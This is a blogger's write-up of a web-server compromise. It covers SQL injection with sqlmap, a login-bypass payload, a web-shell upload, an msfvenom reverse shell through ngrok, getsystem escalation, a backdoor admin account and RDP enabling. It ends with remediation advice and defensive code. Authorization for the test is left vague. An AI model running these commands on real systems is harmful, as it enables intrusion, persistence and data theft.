Disclaimer: This article is for educational purposes only. The techniques described should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Hi, how are you guys? I hope you are fine. This is my first article of the month; I hope you enjoy it.

All of this started when my friend wanted to learn through the website and I thought "hmm, interesting, let's start this one". The journey from initial reconnaissance to gaining full administrator access on a Windows server demonstrates how a simple SQL injection can escalate into complete system compromise.

SQL Injection Attack

SQL injection vulnerability leading to server compromise

Initial Reconnaissance and Subdomain Enumeration

First, I enumerated subdomains using amass and subfinder, with the help of anew, a tool made by tomnomnom.

# Subdomain enumeration with multiple tools
amass enum -d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt

After that, I used httpx to filter active domains with the following command:

# Filter active domains with 200 status code
cat subs.txt | httpx -mc 200 -o 200-subs.txt

Subdomain Enumeration

Subdomain enumeration and active domain filtering

Since there were only a few active domains, I opened each one in the browser one by one, and I came across a login page.

SQL Injection Discovery

I tried entering a single quote (') in the login form and it displayed an error message - a clear indication of a potential SQL injection vulnerability.

SQL Error Message

SQL error message revealing injection vulnerability

I immediately used SQLmap to perform injection with the following command:

sqlmap -u "https://www.site.com/login" --data="username=a&password=b" --random-agent --tamper=space2comment --level 3 --risk 3 --dbs

After waiting for a while, I obtained several databases, confirming the SQL injection vulnerability.


Database Administrator Privileges

Then I tried to see if my user had DBA (Database Administrator) privileges with the following command:

sqlmap -u "https://www.site.com/login" --data="username=a&password=b" --random-agent --tamper=space2comment --level 3 --risk 3 --is-dba


Critical Finding: Yes, I obtained the root user privileges! This meant I had full database administrative access.

Attempting OS Shell Access

I then tried using the following command to get an OS shell:

sqlmap -u "https://www.site.com/login" --data="username=a&password=b" --random-agent --tamper=space2comment --level 3 --risk 3 --os-shell

Unfortunately, I didn't get a backconnect through SQLmap. I really wanted to dump the data, but it wasn't allowed due to security restrictions.

Authentication Bypass and Shell Upload

Back to the login form, I tried bypassing it by using a classic SQL injection payload '=''or' and unexpectedly, I managed to log in successfully.
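The single-quote probe from the discovery step and the login bypass above both come down to the same defect: the password field is pasted into the SQL text. The following is an added example (not code from the original article or the target site) that builds a throwaway SQLite database with constructed sample users, shows a concatenating login function next to a parameterized one, and shows why the lone quote produces a backend error in the first and nothing at all in the second. The table and column names are assumptions for the demo.

```python
import sqlite3

# Constructed sample accounts for the demo; not data from any real system.
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory users table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def render_vulnerable_sql(username, password):
    # String concatenation: whatever the client sends becomes SQL syntax.
    return (
        "SELECT username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Login as the original app presumably did: user input spliced into the query."""
    row = conn.execute(render_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the values never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def single_quote_probe(login_fn, conn):
    """Send a lone quote, as in the discovery step, and report any backend error.

    A syntax error here is the signal the author saw on the login page;
    a parameterized query just treats the quote as an unmatched password.
    """
    try:
        login_fn(conn, "'", "x")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable probe error:", single_quote_probe(login_vulnerable, conn))
    print("safe probe error:", single_quote_probe(login_safe, conn))
    # The bypass payload from the write-up, rendered into the concatenated query.
    print(render_vulnerable_sql("a", "'=''or'"))
    # Bound as a parameter it is just a wrong password.
    print("safe login with payload:", login_safe(conn, "a", "'=''or'"))
```

`render_vulnerable_sql` shows the structural damage: the password clause becomes `password=''=''or''`, a chain of comparisons and an `or` that the backend evaluates as SQL instead of as a string. Whether that rendered clause actually authenticates depends on the backend's comparison rules (MySQL treats `0=''` as true, which is the kind of coercion that turns such a clause into a tautology; SQLite does not), so the example asserts on the query text rather than on a login result. The parameterized version returns `None` for the same input regardless of backend.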

I quickly proceeded to upload a web shell, and it was successful. However, all the directories appeared in red color, indicating restricted permissions.

Not Allowed Permission

I wondered, "Can I obtain the administrator user?" I decided to try using Metasploit and ngrok to establish a reverse connection.

Reverse Shell Setup and Privilege Escalation

I opened a terminal and started ngrok with the following command:

ngrok tcp 1337

Then, I created a payload for backconnect because this website uses a Windows server. I created it using the following command:

# Generate Windows Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<ngrok-host-without-tcp://> lport=<ngrok-port> -f exe -o back.exe

Payload Generation

Generating Windows Meterpreter payload with msfvenom

After that, I ran Metasploit and used the following commands:

# Metasploit handler setup
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1337
exploit

After everything was running, it was time to upload the previously created payload using the backdoor shell. Then, I used the "command" feature available in the backdoor shell to execute the payload I created by typing its name:

back.exe

Success: Back to Metasploit, I successfully obtained a reverse connection!

Successful backconnect in Metasploit

Privilege Escalation to Administrator

I used the "shell" command to gain access to the command prompt (CMD), and then I checked my current user privileges:

# Check current user privileges
whoami
# Output: nt authority\network service (not administrator)

Output of whoami

I was running as a limited service account. I went back to Meterpreter with the "exit" command and ran privilege escalation:

# Privilege escalation commands
getsystem
getuid

BOOM! I successfully obtained Administrator privileges on the Windows server!

Administrator Access

Successfully escalated privileges to Administrator level

Post-Exploitation and RDP Access

After gaining Administrator privileges, I created a new user account and accessed RDP (Remote Desktop Protocol) to demonstrate complete control over the server.

# Create new administrator user
net user hacker P@ssw0rd123 /add
net localgroup administrators hacker /add

# Enable RDP if needed
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

RDP Access

Remote Desktop Protocol access confirming full server control

Impact Assessment

The successful exploitation demonstrated several critical security issues:

  • SQL Injection: Unvalidated user input allowing database access
  • Weak Authentication: Bypassable login mechanisms
  • File Upload Vulnerability: Unrestricted file upload allowing malicious payloads
  • Privilege Escalation: Service account with exploitable system privileges
  • Complete System Compromise: Full Administrator access achieved

Responsible Disclosure and Rewards

I immediately reported my findings to the affected organization. The comprehensive nature of the vulnerability chain and the potential for complete system compromise warranted urgent attention.

Recognition: As a result of the bugs I discovered, I received several acknowledgments and rewards since they encompassed multiple websites and demonstrated critical security flaws.

Remediation Recommendations

To prevent similar attacks, organizations should implement:

  • Input Validation: Proper sanitization of all user inputs
  • Parameterized Queries: Use prepared statements to prevent SQL injection
  • Principle of Least Privilege: Database users should have minimal necessary permissions
  • File Upload Security: Strict validation and sandboxing of uploaded files
  • System Hardening: Regular security updates and privilege restrictions
  • Network Segmentation: Limit the impact of compromised systems
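The "File Upload Security" item above is what would have stopped the web shell step. The following is an added example (not from the original article or the affected site) of the kind of strict server-side validation meant: an allowlist of extensions, a magic-byte check so the content must match the claimed type, a filename pattern that rejects directory components and double extensions, a size cap, and a random storage name so the client never chooses the path. The allowlist, size limit and the idea of storing files outside the web root are assumptions about a reasonable policy, not settings from the page.

```python
import re
import secrets

# Allowed extensions and the leading bytes a genuine file of that type starts with.
# Assumed policy for the demo; a real application would pick its own allowlist.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024  # assumed 5 MiB cap

# One simple stem, one dot, one short extension: no slashes, no "shell.php.png".
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")


def validate_upload(filename, data):
    """Return (accepted, reason) for an uploaded file name and its raw bytes."""
    if not SAFE_NAME.match(filename):
        return False, "filename must be <stem>.<ext> with no path components"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not in allowlist"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    # The extension is client-controlled; the bytes must agree with it.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, ""


def storage_name(ext):
    """Server-chosen random name; the client's name is used only for validation."""
    return secrets.token_hex(16) + "." + ext.lower()


def handle_upload(filename, data):
    """Validate and, if accepted, return the name to store the file under.

    The returned name is meant for a directory outside the web root, so even a
    file that passes validation is never directly executable by the web server.
    """
    ok, reason = validate_upload(filename, data)
    if not ok:
        return None, reason
    return storage_name(filename.rsplit(".", 1)[1]), ""


if __name__ == "__main__":
    # Constructed sample uploads for the demo.
    samples = [
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("notes.txt", b"just text"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("../escape.png", b"\x89PNG\r\n\x1a\n"),
        ("fake.png", b"not an image at all"),
    ]
    for name, blob in samples:
        stored, why = handle_upload(name, blob)
        print(f"{name!r}: {'stored as ' + stored if stored else 'rejected: ' + why}")
```

Checking the magic bytes is what defeats the common trick of renaming a script to an image extension; the filename pattern and the server-chosen name close off path tricks and double extensions. Storing outside the web root and serving uploads through a handler that sets the content type is the remaining piece, which this snippet only returns a name for.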

Conclusion

This engagement demonstrated how a single SQL injection vulnerability can lead to complete system compromise when combined with other security weaknesses. The attack chain progression from initial reconnaissance to full Administrator access highlights the importance of defense in depth and comprehensive security testing.

For penetration testers and security researchers, this case study emphasizes the value of systematic exploitation and the potential for escalation when multiple vulnerabilities are chained together effectively.

Maybe that's all from me; hopefully it can be a reference for you. I'm RyuuKhagetsu, see you in the next article.